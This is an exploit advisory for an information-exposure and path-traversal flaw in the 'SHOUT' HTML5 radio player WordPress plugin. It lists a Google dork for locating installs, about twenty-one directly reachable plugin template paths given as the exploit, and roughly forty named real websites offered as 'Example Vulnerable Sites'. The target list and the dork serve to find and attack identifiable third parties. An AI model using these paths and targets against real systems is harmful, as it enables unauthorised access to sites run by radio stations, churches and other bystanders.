########################################################################################
# Exploit Title : WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link :
codecanyon.net/item/shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin/20667135
# Software Price : 21$
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : From 3.0 To 4.9.x
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg-audio8-html5-radio_ads/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
########################################################################################
WordPress Plugin - SHOUT - HTML5 Radio Player With Ads - ShoutCast and IceCast Support
########################################################################################
# Impact :
***********
* WordPress lbg-audio8-html5-radio_ads 4.9.x and other versions are prone to an arbitrary file disclosure
vulnerability because the plugin fails to properly sanitize user-supplied input.
* An attacker can exploit this vulnerability to view local files in the context of the web server process,
which may aid in launching further attacks.
* An information exposure is the intentional or unintentional disclosure
of information to an actor that is not explicitly authorized to have access to that information.
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* The software uses external input to construct a pathname that is intended to identify a file or
directory that is located underneath a restricted parent directory, but the software does not
properly neutralize special elements within the pathname that can cause the pathname
to resolve to a location that is outside of the restricted directory.
########################################################################################
# Exploit :
*************
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Playlist
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/banners.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/categories.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/help.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Add_New
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Help
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/players.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/playlist.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/preview.html
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/settings_form.php
########################################################################################
Video Tutorials =>
*******************
Installation - youtube.com/watch?v=km5cVH-iH_8
How To Use The Player - youtube.com/watch?v=DVLHNopEpXw
Manage The Banners - youtube.com/watch?v=i4CWseyJmLc
########################################################################################
# Example Vulnerable Sites :
*************************
[+] radioekklesia.com/radio/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] novorio87fm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] skatemetalold.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] j-air.com.au/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] mediality.fr/glitter/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiouppermurray.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] soberforliferadio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiostudion.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiosuper.mobi/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] pamehellas.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] sociedadenewsfm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiopeniel.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] osmiumawards.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiomorabeza.cv/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] wwcufm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiopolis.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiost.com.br/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] patrola021.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] soleilfmbenin.com/sfm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] lawtudent.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] imprensamadureira.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] streaminginternacional.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] bandeando.fm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] mantenanews.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radio-varazdin.hr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] hostpa.com.br/siteum/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiocapital.cat/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] xn--aydnrehberi-1zb.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] gokiebox.pe/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radiotown.fi/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] tendenciafm.cl/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radio7.co.tz/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] radios.bolivia.bo/backup/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] goldenflash.be/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] nordestefmbrasilia.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] ucradio.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] ellinikos.live/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] princesafm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] djgrga-radio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] nococommunityradio.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] diocesedecaxiasdomaranhao.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
[+] umakiwefm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
########################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
########################################################################################